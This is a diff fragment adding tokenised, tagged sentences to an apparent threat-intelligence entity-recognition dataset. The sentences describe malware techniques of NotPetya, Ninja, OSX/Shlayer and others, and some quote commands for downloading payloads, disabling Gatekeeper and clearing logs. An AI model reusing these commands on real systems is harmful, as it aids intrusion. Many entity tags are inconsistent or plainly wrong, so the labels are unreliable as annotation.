"B-SamFile", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "NightClub", + "can", + "modify", + "the", + "Registry", + "to", + "set", + "the", + "ServiceDLL", + "for", + "a", + "service", + "created", + "by", + "the", + "malware", + "for", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NightClub", + "can", + "use", + "multiple", + "native", + "APIs", + "including", + "`GetKeyState`,", + "`GetForegroundWindow`,", + "`GetWindowThreadProcessId`,", + "and", + "`GetKeyboardLayout`." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-Way", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "NightClub", + "has", + "used", + "a", + "non-standard", + "encoding", + "in", + "DNS", + "tunneling", + "removing", + "any", + "`=`", + "from", + "the", + "result", + "of", + "base64", + "encoding,", + "and", + "replacing", + "`/`", + "characters", + "with", + "`-s`", + "and", + "`+`", + "characters", + "with", + "`-p`." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "NightClub", + "can", + "obfuscate", + "strings", + "using", + "the", + "congruential", + "generator", + "`(LCG):", + "staten+1", + "=", + "(690069", + "×", + "staten", + "+", + "1)", + "mod", + "232`." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NightClub", + "has", + "the", + "ability", + "to", + "monitor", + "removable", + "drives." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "NightClub", + "has", + "the", + "ability", + "to", + "use", + "`GetWindowThreadProcessId`", + "to", + "identify", + "the", + "process", + "behind", + "a", + "specified", + "window." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NightClub", + "can", + "load", + "a", + "module", + "to", + "call", + "`CreateCompatibleDC`", + "and", + "`GdipSaveImageToStream`", + "for", + "screen", + "capture." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NightClub", + "can", + "modify", + "the", + "Creation,", + "Access,", + "and", + "Write", + "timestamps", + "for", + "malicious", + "DLLs", + "to", + "match", + "those", + "of", + "the", + "genuine", + "Windows", + "DLL", + "user32.dll." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "B-Features", + "B-Features", + "O", + "B-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "NightClub", + "has", + "created", + "a", + "Windows", + "service", + "named", + "`WmdmPmSp`", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ninja", + "loaders", + "can", + "be", + "side-loaded", + "with", + "legitimate", + "and", + "signed", + "executables", + "including", + "the", + "VLC.exe", + "media", + "player." + ], + "ner_tags": [ + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "Ninja", + "has", + "the", + "ability", + "to", + "modify", + "headers", + "and", + "URL", + "paths", + "to", + "hide", + "malicious", + "traffic", + "in", + "HTTP", + "requests." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "B-HackOrg", + "B-Features", + "O", + "I-Purp", + "O", + "B-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Ninja", + "loader", + "component", + "can", + "decrypt", + "and", + "decompress", + "the", + "payload." + ], + "ner_tags": [ + "O", + "B-SamFile", + "B-SecTeam", + "O", + "O", + "B-Features", + "O", + "B-HackOrg", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "The", + "Ninja", + "payload", + "is", + "XOR", + "encrypted", + "and", + "compressed.", + "Ninja", + "has", + "also", + "XORed", + "its", + "configuration", + "data", + "with", + "a", + "constant", + "value", + "of", + "`0xAA`", + "and", + "compressed", + "it", + "with", + "the", + "LZSS", + "algorithm." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ninja", + "can", + "store", + "its", + "final", + "payload", + "in", + "the", + "Registry", + "under", + "`$HKLM\\SOFTWARE\\Classes\\Interface\\`", + "encrypted", + "with", + "a", + "dynamically", + "generated", + "key", + "based", + "on", + "the", + "drive’s", + "serial", + "number." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ninja", + "has", + "the", + "ability", + "to", + "enumerate", + "directory", + "content." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Ninja", + "can", + "use", + "pipes", + "to", + "redirect", + "the", + "standard", + "input", + "and", + "the", + "standard", + "output." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ninja", + "can", + "proxy", + "C2", + "communications", + "including", + "to", + "and", + "from", + "internal", + "agents", + "without", + "internet", + "connectivity." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ninja", + "has", + "gained", + "execution", + "through", + "victims", + "opening", + "malicious", + "executable", + "files", + "embedded", + "in", + "zip", + "archives." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ninja", + "has", + "used", + "legitimate", + "looking", + "filenames", + "for", + "its", + "loader", + "including", + "update.dll", + "and", + "x64.dll." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Ninja", + "has", + "the", + "ability", + "to", + "use", + "a", + "proxy", + "chain", + "with", + "up", + "to", + "255", + "hops", + "when", + "using", + "TCP." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "The", + "Ninja", + "loader", + "can", + "call", + "Windows", + "APIs", + "for", + "discovery,", + "process", + "injection,", + "and", + "payload", + "decryption." + ], + "ner_tags": [ + "O", + "I-SamFile", + "B-SecTeam", + "O", + "O", + "B-Features", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Ninja", + "can", + "forward", + "TCP", + "packets", + "between", + "the", + "C2", + "and", + "a", + "remote", + "host." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "I-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ninja", + "can", + "encode", + "C2", + "communications", + "with", + "a", + "base64", + "algorithm", + "using", + "a", + "custom", + "alphabet." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Ninja", + "can", + "enumerate", + "processes", + "on", + "a", + "targeted", + "host." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "B-Purp", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ninja", + "has", + "the", + "ability", + "to", + "inject", + "an", + "agent", + "module", + "into", + "a", + "new", + "process", + "and", + "arbitrary", + "shellcode", + "into", + "running", + "processes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ninja", + "has", + "the", + "ability", + "to", + "mimic", + "legitimate", + "services", + "with", + "customized", + "HTTP", + "URL", + "paths", + "and", + "headers", + "to", + "hide", + "malicious", + "traffic." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Ninja", + "loader", + "components", + "can", + "be", + "executed", + "through", + "rundll32.exe." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Ninja", + "can", + "configure", + "its", + "agent", + "to", + "work", + "only", + "in", + "specific", + "time", + "frames." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ninja", + "has", + "been", + "distributed", + "to", + "victims", + "via", + "the", + "messaging", + "app", + "Telegram." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ninja", + "can", + "XOR", + "and", + "AES", + "encrypt", + "C2", + "messages." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ninja", + "can", + "obtain", + "the", + "computer", + "name", + "and", + "information", + "on", + "the", + "OS", + "and", + "physical", + "drives", + "from", + "targeted", + "hosts." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ninja", + "can", + "enumerate", + "the", + "IP", + "address", + "on", + "compromised", + "systems." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "B-SamFile", + "O", + "O", + "B-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ninja", + "can", + "change", + "or", + "create", + "the", + "last", + "access", + "or", + "write", + "times." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ninja", + "can", + "use", + "HTTP", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ninja", + "can", + "create", + "the", + "services", + "`httpsvc`", + "and", + "`w3esvc`", + "for", + "persistence", + "." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Nltest", + "may", + "be", + "used", + "to", + "enumerate", + "trusted", + "domains", + "by", + "using", + "commands", + "such", + "as", + "<code>nltest", + "/domain_trusts</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Nltest", + "may", + "be", + "used", + "to", + "enumerate", + "remote", + "domain", + "controllers", + "using", + "options", + "such", + "as", + "<code>/dclist</code>", + "and", + "<code>/dsgetdc</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-Purp", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Nltest", + "may", + "be", + "used", + "to", + "enumerate", + "the", + "parent", + "domain", + "of", + "a", + "local", + "machine", + "using", + "<code>/parentdomain</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NotPetya", + "uses", + "<code>wevtutil</code>", + "to", + "clear", + "the", + "Windows", + "event", + "logs." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NotPetya", + "encrypts", + "user", + "files", + "and", + "disk", + "structures", + "like", + "the", + "MBR", + "with", + "2048-bit", + "RSA." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NotPetya", + "can", + "use", + "two", + "exploits", + "in", + "SMBv1,", + "EternalBlue", + "and", + "EternalRomance,", + "to", + "spread", + "itself", + "to", + "other", + "remote", + "systems", + "on", + "the", + "network." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NotPetya", + "searches", + "for", + "files", + "ending", + "with", + "dozens", + "of", + "different", + "file", + "extensions", + "prior", + "to", + "encryption." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NotPetya", + "contains", + "a", + "modified", + "version", + "of", + "Mimikatz", + "to", + "help", + "gather", + "credentials", + "that", + "are", + "later", + "used", + "for", + "lateral", + "movement." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NotPetya", + "can", + "use", + "valid", + "credentials", + "with", + "PsExec", + "or", + "<code>wmic</code>", + "to", + "spread", + "itself", + "to", + "remote", + "systems." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Way", + "I-Way", + "I-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NotPetya", + "drops", + "PsExec", + "with", + "the", + "filename", + "dllhost.dat." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "NotPetya", + "uses", + "<code>rundll32.exe</code>", + "to", + "install", + "itself", + "on", + "remote", + "systems", + "when", + "accessed", + "via", + "PsExec", + "or", + "<code>wmic</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "NotPetya", + "can", + "use", + "PsExec,", + "which", + "interacts", + "with", + "the", + "<code>ADMIN$</code>", + "network", + "share", + "to", + "execute", + "commands", + "on", + "remote", + "systems." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NotPetya", + "creates", + "a", + "task", + "to", + "reboot", + "the", + "system", + "one", + "hour", + "after", + "infection." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NotPetya", + "determines", + "if", + "specific", + "antivirus", + "programs", + "are", + "running", + "on", + "an", + "infected", + "host", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NotPetya", + "can", + "use", + "PsExec", + "to", + "help", + "propagate", + "itself", + "across", + "a", + "network." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NotPetya", + "will", + "reboot", + "the", + "system", + "one", + "hour", + "after", + "infection." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NotPetya", + "can", + "use", + "<code>wmic</code>", + "to", + "help", + "propagate", + "itself", + "across", + "a", + "network." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OLDBAIT", + "collects", + "credentials", + "from", + "several", + "email", + "clients." + ], + "ner_tags": [ + "B-Idus", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OLDBAIT", + "collects", + "credentials", + "from", + "Internet", + "Explorer,", + "Mozilla", + "Firefox,", + "and", + "Eudora." + ], + "ner_tags": [ + "B-Idus", + "I-Features", + "I-Features", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "OLDBAIT", + "can", + "use", + "SMTP", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "OLDBAIT", + "installs", + "itself", + "in", + "<code>%ALLUSERPROFILE%\\\\Application", + "Data\\Microsoft\\MediaPlayer\\updatewindws.exe</code>;", + "the", + "directory", + "name", + "is", + "missing", + "a", + "space", + "and", + "the", + "file", + "name", + "is", + "missing", + "the", + "letter", + "\"o.\"" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OLDBAIT", + "obfuscates", + "internal", + "strings", + "and", + "unpacks", + "them", + "at", + "startup." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OLDBAIT", + "can", + "use", + "HTTP", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "OSInfo", + "enumerates", + "local", + "and", + "domain", + "users" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OSInfo", + "specifically", + "looks", + "for", + "Domain", + "Admins", + "and", + "power", + "users", + "within", + "the", + "domain." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "I-Features", + "B-Purp", + "O", + "B-Purp", + "B-Org", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OSInfo", + "enumerates", + "local", + "and", + "domain", + "users" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OSInfo", + "has", + "enumerated", + "the", + "local", + "administrators", + "group." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OSInfo", + "discovers", + "shares", + "on", + "the", + "network" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OSInfo", + "queries", + "the", + "registry", + "to", + "look", + "for", + "information", + "about", + "Terminal", + "Services." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OSInfo", + "performs", + "a", + "connection", + "test", + "to", + "discover", + "remote", + "systems", + "in", + "the", + "network" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OSInfo", + "discovers", + "information", + "about", + "the", + "infected", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OSInfo", + "discovers", + "the", + "current", + "domain", + "information." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OSInfo", + "enumerates", + "the", + "current", + "network", + "connections", + "similar", + "to", + "<code>", + "net", + "use", + "</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OSX/Shlayer", + "can", + "install", + "malicious", + "Safari", + "browser", + "extensions", + "to", + "serve", + "ads." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OSX/Shlayer", + "can", + "base64-decode", + "and", + "AES-decrypt", + "downloaded", + "payloads.", + "Versions", + "of", + "OSX/Shlayer", + "pass", + "encrypted", + "and", + "password-protected", + "code", + "to", + "<code>openssl</code>", + "and", + "then", + "write", + "the", + "payload", + "to", + "the", + "<code>/tmp</code>", + "folder." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "OSX/Shlayer", + "can", + "escalate", + "privileges", + "to", + "root", + "by", + "asking", + "the", + "user", + "for", + "credentials." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OSX/Shlayer", + "has", + "used", + "the", + "command", + "<code>appDir=\"$(dirname", + "$(dirname", + "\"$currentDir\"))\"</code>", + "and", + "<code>$(dirname", + "\"$(pwd", + "-P)\")</code>", + "to", + "construct", + "installation", + "paths." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "If", + "running", + "with", + "elevated", + "privileges,", + "OSX/Shlayer", + "has", + "used", + "the", + "<code>spctl</code>", + "command", + "to", + "disable", + "Gatekeeper", + "protection", + "for", + "a", + "downloaded", + "file.", + "OSX/Shlayer", + "can", + "also", + "leverage", + "system", + "links", + "pointing", + "to", + "bash", + "scripts", + "in", + "the", + "downloaded", + "DMG", + "file", + "to", + "bypass", + "Gatekeeper,", + "a", + "flaw", + "patched", + "in", + "macOS", + "11.3", + "and", + "later", + "versions.", + "OSX/Shlayer", + "has", + "been", + "Notarized", + "by", + "Apple,", + "resulting", + "in", + "successful", + "passing", + "of", + "additional", + "Gatekeeper", + "checks." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OSX/Shlayer", + "has", + "executed", + "a", + ".command", + "script", + "from", + "a", + "hidden", + "directory", + "in", + "a", + "mounted", + "DMG." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OSX/Shlayer", + "has", + "used", + "the", + "<code>mktemp</code>", + "utility", + "to", + "make", + "random", + "and", + "unique", + "filenames", + "for", + "payloads,", + "such", + "as", + "<code>export", + "tmpDir=\"$(mktemp", + "-d", + "/tmp/XXXXXXXXXXXX)\"</code>", + "or", + "<code>mktemp", + "-t", + "Installer</code>." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "OSX/Shlayer", + "has", + "used", + "the", + "`nohup`", + "command", + "to", + "instruct", + "executed", + "payloads", + "to", + "ignore", + "hangup", + "signals." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OSX/Shlayer", + "can", + "download", + "payloads,", + "and", + "extract", + "bytes", + "from", + "files.", + "OSX/Shlayer", + "uses", + "the", + "<code>curl", + "-fsL", + "\"$url\"", + ">$tmp_path</code>", + "command", + "to", + "download", + "malicious", + "payloads", + "into", + "a", + "temporary", + "directory." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "I-Features", + "B-HackOrg", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OSX/Shlayer", + "can", + "use", + "the", + "<code>chmod</code>", + "utility", + "to", + "set", + "a", + "file", + "as", + "executable,", + "such", + "as", + "<code>chmod", + "777</code>", + "or", + "<code>chmod", + "+x</code>." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OSX/Shlayer", + "has", + "relied", + "on", + "users", + "mounting", + "and", + "executing", + "a", + "malicious", + "DMG", + "file." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OSX/Shlayer", + "can", + "masquerade", + "as", + "a", + "Flash", + "Player", + "update." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OSX/Shlayer", + "has", + "used", + "a", + "resource", + "fork", + "to", + "hide", + "a", + "compressed", + "binary", + "file", + "of", + "itself", + "from", + "the", + "terminal,", + "Finder,", + "and", + "potentially", + "evade", + "traditional", + "scanners." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OSX/Shlayer", + "has", + "collected", + "the", + "IOPlatformUUID,", + "session", + "UID,", + "and", + "the", + "OS", + "version", + "using", + "the", + "command", + "<code>sw_vers", + "-productVersion</code>." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "OSX/Shlayer", + "can", + "use", + "bash", + "scripts", + "to", + "check", + "the", + "macOS", + "version,", + "download", + "payloads,", + "and", + "extract", + "bytes", + "from", + "files.", + "OSX/Shlayer", + "uses", + "the", + "command", + "<code>sh", + "-c", + "tail", + "-c", + "+1381...</code>", + "to", + "extract", + "bytes", + "at", + "an", + "offset", + "from", + "a", + "specified", + "file.", + "OSX/Shlayer", + "uses", + "the", + "<code>curl", + "-fsL", + "\"$url\"", + ">$tmp_path</code>", + "command", + "to", + "download", + "malicious", + "payloads", + "into", + "a", + "temporary", + "directory." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "B-Features", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-SamFile", + "B-Way", + "B-SamFile", + "B-SamFile", + "O", + "O", + "I-Features", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OSX_OCEANLOTUS.D", + "has", + "used", + "AES", + "in", + "CBC", + "mode", + "to", + "encrypt", + "collected", + "data", + "when", + "saving", + "that", + "data", + "to", + "disk." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OSX_OCEANLOTUS.D", + 